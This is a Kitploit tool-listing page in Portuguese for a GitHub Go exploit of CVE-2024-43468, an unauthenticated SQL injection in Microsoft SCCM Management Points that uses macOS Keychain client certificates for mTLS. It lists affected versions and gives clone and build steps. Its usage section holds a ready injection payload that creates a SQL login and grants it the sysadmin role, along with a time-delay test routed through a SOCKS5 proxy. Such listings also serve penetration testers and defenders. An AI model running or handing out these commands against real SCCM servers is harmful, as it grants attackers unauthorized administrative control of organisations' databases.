Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-43468_mTLS_go — CVE-2024-43468 Exploit de Injeção SQL no SCCM (versão com cert de cliente mTLS não extraível do keychain do MacOS) | Kitploit
Ferramentas/GitHubGitHub/nikallass/cve-2024-43468_mtls_go
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAutenticaçãoRed Teaming
GitHubnikallass/cve-2024-43468_mtls_go

CVE-2024-43468_mTLS_go

CVE-2024-43468 Exploit de Injeção SQL no SCCM (versão com cert de cliente mTLS não extraível do keychain do MacOS)

Ver Repositório
322há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-43468 Exploit de Injeção SQL no SCCM (versão com certificados de cliente mTLS do keychain do MacOS)

Implementação em Go do exploit CVE-2024-43468 que utiliza o Keychain do macOS para autenticação mTLS (sem necessidade de exportar chaves do keychain).

Adicionalmente:

  • Adicionado suporte a proxy para não usar proxychains problemáticos.
  • Adicionado get_cert_name.py para obter o Common Name do certificado (sim, você pode fazer isso manualmente pela GUI do Keychain Access)
  • Adicionado bastante depuração para ver o que está acontecendo

Baseado em:

  • exploit Python original
  • exemplo de cliente Go mTLS

Descrição

Explora injeções SQL não autenticadas no Microsoft Configuration Manager (ConfigMgr / SCCM) que permitem a um atacante com acesso de rede a um Management Point executar consultas SQL arbitrárias no banco de dados do site.

Versões vulneráveis:

  • < 2403 (5.00.9128.1024)
  • < 2309 (5.00.9122.1033)
  • < 2303 (5.00.9106.1037)
  • <= 2211

Instalação

root@kitploit:~
# Clonar o repositório
git clone https://github.com/nikallass/CVE-2024-43468_mTLS_go
cd CVE-2024-43468_mTLS_go

# Instalar dependências
go get github.com/google/uuid
go get golang.org/x/net/proxy

# Compilar
go build -o sccm

Uso

root@kitploit:~
# Mostrar ajuda
./sccm -h

# Uso básico (criar novo admin)
./sccm -t https://sccm-mp.local \
       -sql "create login user123 with password = 'Password123'; exec master.dbo.sp_addsrvrolemember 'user123', 'sysadmin'" \
       -cn "CertificateCommonName"

# Com proxy personalizado (testar com sleep 5)
./sccm -t https://sccm-mp.local \
       -sql "WAITFOR DELAY '0:0:5'" \
       -cn "CertificateCommonName" \
       -proxy "127.0.0.1:9050"

Parâmetros

ParâmetroDescrição
-tURL alvo (obrigatório)
-sqlConsulta SQL a executar (obrigatório)
-cnCommon Name do certificado no Keychain do macOS (obrigatório)
-proxyEndereço do proxy SOCKS5 (padrão: vazio)

Requisitos

  • macOS (para integração com Keychain)
  • Go 1.16+
  • Certificado de cliente no Keychain do macOS
  • opcional: proxy SOCKS5

Referências

  • Aviso da Microsoft
  • Aviso da Synacktiv
  • Exemplo de cliente Go mTLS
Baixar ferramenta